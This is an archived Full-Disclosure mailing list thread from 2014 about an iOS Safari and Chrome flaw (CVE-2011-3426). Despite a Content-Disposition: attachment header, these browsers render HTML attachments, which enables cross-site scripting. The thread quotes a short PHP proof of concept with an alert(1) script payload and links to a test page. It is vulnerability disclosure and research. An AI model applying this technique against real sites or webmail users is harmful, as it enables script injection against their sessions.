lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <53D92929.2010904@securify.nl>
Date: Wed, 30 Jul 2014 19:19:37 +0200
From: "Securify B.V." <lists@...urify.nl>
To: fulldisclosure@...lists.org
Subject: Re: [FD] Bypassing Content-Disposition: attachment for XSS on
Chrome/Safari(IOS 6.x)
Attached is a screenshot that demonstrates this issue on Yahoo! Mail.
Despite the Content-Disposition header, (HTML) attachments are rendered
by Mobile Safari.
On 30-07-14 19:01, Securify B.V. wrote:
> This issue was originally reported as CVE-2011-3426. We can confirm
> that Mobile Safari on iOS 7.1.2 is still affected. We've reported this
> to Apple on February 25, 2014. You can test is yourself at:
> http://www.securify.nl/cve-2011-3426.html
>
> This test page sets the following HTTP headers:
>
> Content-Disposition: attachment;filename=cve-2011-3426.html
> Content-Type: application/octet-stream
>
> With kind regards,
>
> Yorick
>
>
> On di, 2014-07-29 at 15:56 +0800, heige wrote:
> >
> > > > Bypassing Content-Disposition: attachment for XSS on
> Chrome/Safari(IOS)
> > > >
> > > > by Superhei of KnownSec team (www.knownsec.com) 2013.6.3
> > > >
> > > > Test Environment
> > > > ipad(ios 6.1.3)
> > > > Chrome(26.0.1410.53)
> > > >
> > > > This code is downloader for attachment which is a HTML file.
> > > >
> > > > <?php
> > > > //down.php
> > > > header("Content-Type:text/plain");
> > > > //header("Content-Type:text/html");
> > > > header("Content-Disposition: attachment; filename=\"test.html\"");
> > > > echo "<html><script>alert(1)</script></html>";
> > > > ?>
> > > >
> > > > On IOS , when Chrome/Safari visit the down.php, the HTML code
> will be running.Ofcourse, including the javascript and led to
> cross-site scripting attacks.
> > > >
> > >
> > from http://www.80vul.com/apple.txt
Download attachment "cve-2011-3426_mobilesafari_yahoo.png" of type "image/png" (74148 bytes)
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists